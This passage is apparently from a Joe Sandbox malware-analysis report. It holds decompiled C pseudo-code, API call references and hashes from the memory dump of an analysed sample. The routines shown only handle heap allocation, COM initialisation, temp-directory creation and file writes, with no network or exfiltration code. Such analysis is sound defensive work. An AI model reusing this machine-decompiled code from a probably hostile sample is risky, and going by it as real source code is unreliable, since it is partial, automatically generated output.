                                                                                                                                                  0x00406730
                                                                                                                                                  0x00406737

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  • Opcode ID: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                                                                                                                                  • Instruction ID: 97085aaf5d90ff1175411855662eb62e74a246e0554bdcf5be02ff30625659a3
                                                                                                                                                  • Opcode Fuzzy Hash: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0F871244701DFD324CF1ADD01B1AFBE8FB94710F01C82EE0A9976A0D7B0A8058F94
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 585 407470-4074b6 HeapCreate RtlAllocateHeap
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00407470() {
                                                                                                                                                  				void* _t1;
                                                                                                                                                  				long _t2;
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t1 = HeapCreate(1, 0x1000, 0); // executed
                                                                                                                                                  				 *0x40b3b4 = _t1;
                                                                                                                                                  				 *0x40b3b0 = 0;
                                                                                                                                                  				 *0x40b444 = 0x10;
                                                                                                                                                  				_t2 =  *0x40b444; // 0x4104
                                                                                                                                                  				_t4 =  *0x40b3b4; // 0x21d0000
                                                                                                                                                  				_t3 = RtlAllocateHeap(_t4, 1, _t2);
                                                                                                                                                  				 *0x40a390 = _t3;
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}







                                                                                                                                                  0x0040747c
                                                                                                                                                  0x00407482
                                                                                                                                                  0x00407487
                                                                                                                                                  0x00407491
                                                                                                                                                  0x0040749b
                                                                                                                                                  0x004074a3
                                                                                                                                                  0x004074aa
                                                                                                                                                  0x004074b0
                                                                                                                                                  0x004074b6

                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                                                                                                                                  • RtlAllocateHeap.NTDLL(021D0000,00000001,00004104), ref: 004074AA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocateCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2875408731-0
                                                                                                                                                  • Opcode ID: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                                                                                                                                  • Instruction ID: edee8b013b50a9eb835c02f3e92a01e020b9c77627f8564c048df27c577a0994
                                                                                                                                                  • Opcode Fuzzy Hash: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                                                                                                                                  • Instruction Fuzzy Hash: 25E0B670144304AFE314CF50EF05F563BA8F304744F100429FA48AA3AAC7F264508B9E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 586 403694-4036a1 6F7EDB20 CoInitialize
                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E00403694() {
                                                                                                                                                  				void* _t1;
                                                                                                                                                  
                                                                                                                                                  				L00407E14();
                                                                                                                                                  				_t1 =  *0x40a870(0); // executed
                                                                                                                                                  				return _t1;
                                                                                                                                                  			}




                                                                                                                                                  0x00403694
                                                                                                                                                  0x0040369b
                                                                                                                                                  0x004036a1

                                                                                                                                                  APIs
                                                                                                                                                  • 6F7EDB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040369B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Initialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                  • Opcode ID: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                                                                                                                                  • Instruction ID: e54652b8d3c1eea1b95337253ed1730e4f0a5e5d42e685e6d2013b240332fa4d
                                                                                                                                                  • Opcode Fuzzy Hash: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                                                                                                                                  • Instruction Fuzzy Hash: 19A0023194924056DD4077729A0BB0D3570678174AF1044E9B105751D24974982285AB
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00401BDD(void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				CHAR* _v20;
                                                                                                                                                  				CHAR* _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                  				void* _t60;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                  				void* _t64;
                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                  				void* _t71;
                                                                                                                                                  
                                                                                                                                                  				_t71 = __eflags;
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_v20 = E00403DC0(0x400);
                                                                                                                                                  				_t15 =  *0x40b3b0; // 0x0
                                                                                                                                                  				E00405EB2(_t71, _t15);
                                                                                                                                                  				_t60 = _t15;
                                                                                                                                                  				E004030F0( &_v20, _t60);
                                                                                                                                                  				GetTempFileNameA(_v20, 0x40a00d, 0, _v24);
                                                                                                                                                  				_t19 =  *0x40b3b0; // 0x0
                                                                                                                                                  				E00403E50(_v24, _t19);
                                                                                                                                                  				_t61 = _t19;
                                                                                                                                                  				E004030F0(0x40b12c, _t61);
                                                                                                                                                  				E00403E30( *_t69);
                                                                                                                                                  				E00405EA0( *0x40b12c); // executed
                                                                                                                                                  				E00405F13( *0x40b12c);
                                                                                                                                                  				_t25 =  *0x40b3b0; // 0x0
                                                                                                                                                  				E00405DD5(_t71, _t25);
                                                                                                                                                  				_t62 = _t25;
                                                                                                                                                  				E004030F0(0x40b124, _t62);
                                                                                                                                                  				_push(E00403EA0(_v28));
                                                                                                                                                  				if(0 !=  *_t69) {
                                                                                                                                                  					__eflags = 1 - _v20;
                                                                                                                                                  					if(1 == _v20) {
                                                                                                                                                  						_v8 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					if(E00403EA0(_a4 + 1) == 1) {
                                                                                                                                                  						_push( *0x40b3b0);
                                                                                                                                                  						E004074F0(0x40a00e);
                                                                                                                                                  						_t66 =  *0x40b124; // 0x21d0488
                                                                                                                                                  						E004074F0(_t66);
                                                                                                                                                  						E004074F0(0x40a011);
                                                                                                                                                  						_pop(_t68);
                                                                                                                                                  						E004030F0(0x40b128, _t68);
                                                                                                                                                  					}
                                                                                                                                                  					_t63 =  *0x40b12c; // 0x21d4838
                                                                                                                                                  					_push( *0x40b3b0);
                                                                                                                                                  					E004074F0(_t63);
                                                                                                                                                  					_pop(_t64);
                                                                                                                                                  					E004030F0(0x40b124, _t64);
                                                                                                                                                  					_v8 = 2;
                                                                                                                                                  				}
                                                                                                                                                  				 *0x40b11c = E00403EA0(_a4 + _v8);
                                                                                                                                                  				 *0x40b120 = E00403EA0(_a4 + _v8 + 1);
                                                                                                                                                  				return E00407550(1, _v12);
                                                                                                                                                  			}




















                                                                                                                                                  0x00401bdd
                                                                                                                                                  0x00401be0
                                                                                                                                                  0x00401be1
                                                                                                                                                  0x00401be2
                                                                                                                                                  0x00401bed
                                                                                                                                                  0x00401bf0
                                                                                                                                                  0x00401bf7
                                                                                                                                                  0x00401c00
                                                                                                                                                  0x00401c01
                                                                                                                                                  0x00401c17
                                                                                                                                                  0x00401c1c
                                                                                                                                                  0x00401c27
                                                                                                                                                  0x00401c32
                                                                                                                                                  0x00401c33
                                                                                                                                                  0x00401c3b
                                                                                                                                                  0x00401c46
                                                                                                                                                  0x00401c51
                                                                                                                                                  0x00401c56
                                                                                                                                                  0x00401c5d
                                                                                                                                                  0x00401c68
                                                                                                                                                  0x00401c69
                                                                                                                                                  0x00401c77
                                                                                                                                                  0x00401c7d
                                                                                                                                                  0x00401cef
                                                                                                                                                  0x00401cf2
                                                                                                                                                  0x00401cf4
                                                                                                                                                  0x00401cf4
                                                                                                                                                  0x00401c7f
                                                                                                                                                  0x00401c90
                                                                                                                                                  0x00401c92
                                                                                                                                                  0x00401c9d
                                                                                                                                                  0x00401ca2
                                                                                                                                                  0x00401ca8
                                                                                                                                                  0x00401cb2
                                                                                                                                                  0x00401cbd
                                                                                                                                                  0x00401cbe
                                                                                                                                                  0x00401cbe
                                                                                                                                                  0x00401cc3
                                                                                                                                                  0x00401cc9
                                                                                                                                                  0x00401ccf
                                                                                                                                                  0x00401cda
                                                                                                                                                  0x00401cdb
                                                                                                                                                  0x00401ce0
                                                                                                                                                  0x00401ce0
                                                                                                                                                  0x00401d0c
                                                                                                                                                  0x00401d21
                                                                                                                                                  0x00401d3c

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(020E0000,00000008,00000000), ref: 00403DD1
                                                                                                                                                    • Part of subcall function 00405EB2: GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                                                                                                                                    • Part of subcall function 00405EB2: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                                                                                                                                    • Part of subcall function 00405EB2: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                                                                                                                                    • Part of subcall function 00405EB2: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                                                                                                                                    • Part of subcall function 00405EB2: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                                                                                                                                  • GetTempFileNameA.KERNEL32(?,0040A00D,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000,00000000,00000000), ref: 00401C17
                                                                                                                                                    • Part of subcall function 00403E50: memcpy.MSVCRT ref: 00403E83
                                                                                                                                                    • Part of subcall function 00403E30: HeapFree.KERNEL32(020E0000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                                                                                                                                    • Part of subcall function 00405F13: strncpy.MSVCRT ref: 00405F31
                                                                                                                                                    • Part of subcall function 00405F13: strlen.MSVCRT ref: 00405F41
                                                                                                                                                    • Part of subcall function 00405F13: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00405F7E
                                                                                                                                                    • Part of subcall function 00405DD5: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,?,?,?,00000000,00401C62,00000000,00000000,00000000,00000000,?,0040A00D,00000000), ref: 00405DEB
                                                                                                                                                    • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectoryFreeHeapLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4243183096-0
                                                                                                                                                  • Opcode ID: c3464696806c0409d0bb8dbf5b053a24e4728aea5873732a0615b8c1c001ca45
                                                                                                                                                  • Instruction ID: 2dff8fe517095d79ad9ad3ab911cbcc41af86ea3352296ed8cd7210842124807
                                                                                                                                                  • Opcode Fuzzy Hash: c3464696806c0409d0bb8dbf5b053a24e4728aea5873732a0615b8c1c001ca45
                                                                                                                                                  • Instruction Fuzzy Hash: 823143701182009FD300FF65ED92E6B7BA9EB48305F10883EF581B61A7C73DA9519B9E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 636 407750-40776d 637 4077a2-4077bf 636->637 638 40776f-40779d RtlReAllocateHeap 636->638 638->637
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00407750(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _t10;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				intOrPtr _t18;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  
                                                                                                                                                  				_t10 =  *0x40b3b0; // 0x0
                                                                                                                                                  				_v12 = _t10 + _a4;
                                                                                                                                                  				_t18 =  *0x40b444; // 0x4104
                                                                                                                                                  				if(_v12 >= _t18 - 4) {
                                                                                                                                                  					 *0x40b444 = _v12 + 0x4000;
                                                                                                                                                  					_t15 =  *0x40b444; // 0x4104
                                                                                                                                                  					_t22 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  					_t25 =  *0x40b3b4; // 0x21d0000
                                                                                                                                                  					_t17 = RtlReAllocateHeap(_t25, 1, _t22, _t15 + 5); // executed
                                                                                                                                                  					 *0x40a390 = _t17;
                                                                                                                                                  				}
                                                                                                                                                  				_t12 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  				_v8 = _t12 + _a8;
                                                                                                                                                  				 *0x40b3b0 = _a8 + _a4;
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}












                                                                                                                                                  0x00407756
                                                                                                                                                  0x0040775e
                                                                                                                                                  0x00407761
                                                                                                                                                  0x0040776d
                                                                                                                                                  0x00407778
                                                                                                                                                  0x0040777e
                                                                                                                                                  0x00407787
                                                                                                                                                  0x00407790
                                                                                                                                                  0x00407797
                                                                                                                                                  0x0040779d
                                                                                                                                                  0x0040779d
                                                                                                                                                  0x004077a2
                                                                                                                                                  0x004077aa
                                                                                                                                                  0x004077b3
                                                                                                                                                  0x004077bf

                                                                                                                                                  APIs
                                                                                                                                                  • RtlReAllocateHeap.NTDLL(021D0000,00000001,021D06F0,000040FF), ref: 00407797
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  • Opcode ID: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                                                                                                                                  • Instruction ID: 28936eabe9b6fdea5660807dec5754b311fbf5a963c992916f66545fa0493ef0
                                                                                                                                                  • Opcode Fuzzy Hash: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                                                                                                                                  • Instruction Fuzzy Hash: F301C975900208EFC708CF58EE95A597BB4FB88308B108179ED09A7356D730AA60CB9E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 639 4030a0-4030bd RtlAllocateHeap 640 4030e7-4030ed 639->640 641 4030bf-4030e4 639->641 641->640
                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E004030A0(void* __eax, signed int _a4, intOrPtr _a8) {
                                                                                                                                                  				intOrPtr _v0;
                                                                                                                                                  				intOrPtr _v4;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  
                                                                                                                                                  				_push(__eax);
                                                                                                                                                  				_t14 = RtlAllocateHeap( *0x40b0f8, 8, _a4 * (__eax + 1) + 0x18); // executed
                                                                                                                                                  				_pop(_t19);
                                                                                                                                                  				_t15 = _t14;
                                                                                                                                                  				if(_t15 != 0) {
                                                                                                                                                  					 *((intOrPtr*)(_t15 + 0x10)) = _t19;
                                                                                                                                                  					 *((intOrPtr*)(_t15 + 4)) = _v4;
                                                                                                                                                  					 *((intOrPtr*)(_t15 + 8)) = _v0;
                                                                                                                                                  					 *((intOrPtr*)(_t15 + 0xc)) = _a4;
                                                                                                                                                  					 *((intOrPtr*)(_t15 + 0x14)) = _a8;
                                                                                                                                                  					 *_t15 = 1;
                                                                                                                                                  					_t15 = _t15 + 0x18;
                                                                                                                                                  				}
                                                                                                                                                  				 *_a4 = _t15;
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}








                                                                                                                                                  0x004030a0
                                                                                                                                                  0x004030b5
                                                                                                                                                  0x004030ba
                                                                                                                                                  0x004030bb
                                                                                                                                                  0x004030bd
                                                                                                                                                  0x004030bf
                                                                                                                                                  0x004030c6
                                                                                                                                                  0x004030cd
                                                                                                                                                  0x004030d4
                                                                                                                                                  0x004030db
                                                                                                                                                  0x004030de
                                                                                                                                                  0x004030e4
                                                                                                                                                  0x004030e4
                                                                                                                                                  0x004030eb
                                                                                                                                                  0x004030ed

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  • Opcode ID: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                                                                                                                                  • Instruction ID: 460cff1aebd5c89f6a466e3c7b53c8f2e2deecb765fd07c7d01cf3f68e72b86a
                                                                                                                                                  • Opcode Fuzzy Hash: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                                                                                                                                  • Instruction Fuzzy Hash: 91F0BCB1604701AFC308CF05C940A0BFBE6EFC8311F15C96AE4989B36AE775D842CB91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405F90(void** _a4) {
                                                                                                                                                  				long _v4;
                                                                                                                                                  				void** _t20;
                                                                                                                                                  
                                                                                                                                                  				_t20 = _a4;
                                                                                                                                                  				_v4 = 0;
                                                                                                                                                  				if(_t20[5] == 0) {
                                                                                                                                                  					WriteFile( *_t20, _t20[1], _t20[2] - _t20[3],  &_v4, 0); // executed
                                                                                                                                                  					_t20[3] = _t20[2];
                                                                                                                                                  					return _v4;
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}





                                                                                                                                                  0x00405f92
                                                                                                                                                  0x00405f9b
                                                                                                                                                  0x00405f9f
                                                                                                                                                  0x00405fb5
                                                                                                                                                  0x00405fc2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405fc2
                                                                                                                                                  0x00405fc7

                                                                                                                                                  APIs
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,004063E4,00000000,?,?,?,00406298,00000000,?,?), ref: 00405FB5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                  • Opcode ID: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                                                                                                                                  • Instruction ID: 772ef9aa7f968d4b686b07dbd3a32be2510b3ef25a50012a320cac0da8777639
                                                                                                                                                  • Opcode Fuzzy Hash: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                                                                                                                                  • Instruction Fuzzy Hash: DAE0AEB6515701AFC324CF68C948C67F7F8EB88610B00C92EA89A93A00E630F840CF61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406807() {
                                                                                                                                                  				void* _t1;
                                                                                                                                                  
                                                                                                                                                  				_t1 = HeapCreate(0, 0x400, 0); // executed
                                                                                                                                                  				 *0x40b440 = _t1;
                                                                                                                                                  				return _t1;
                                                                                                                                                  			}




                                                                                                                                                  0x00406810
                                                                                                                                                  0x00406816
                                                                                                                                                  0x0040681b

                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                                                                                                                                  • Instruction ID: a1970917e828b1c725cfc33b77b9c06a1eec18c1769a3480f2e18b6e12359080
                                                                                                                                                  • Opcode Fuzzy Hash: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                                                                                                                                  • Instruction Fuzzy Hash: FDB011B0280300ABE2200F20AE0AB003A20B300B0AF200020F300B82E0CBB020208A0E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00403D90() {
                                                                                                                                                  				void* _t1;
                                                                                                                                                  
                                                                                                                                                  				_t1 = HeapCreate(0, 0x1000, 0); // executed
                                                                                                                                                  				 *0x40b404 = _t1;
                                                                                                                                                  				return _t1;
                                                                                                                                                  			}




                                                                                                                                                  0x00403d99
                                                                                                                                                  0x00403d9f
                                                                                                                                                  0x00403da4

                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
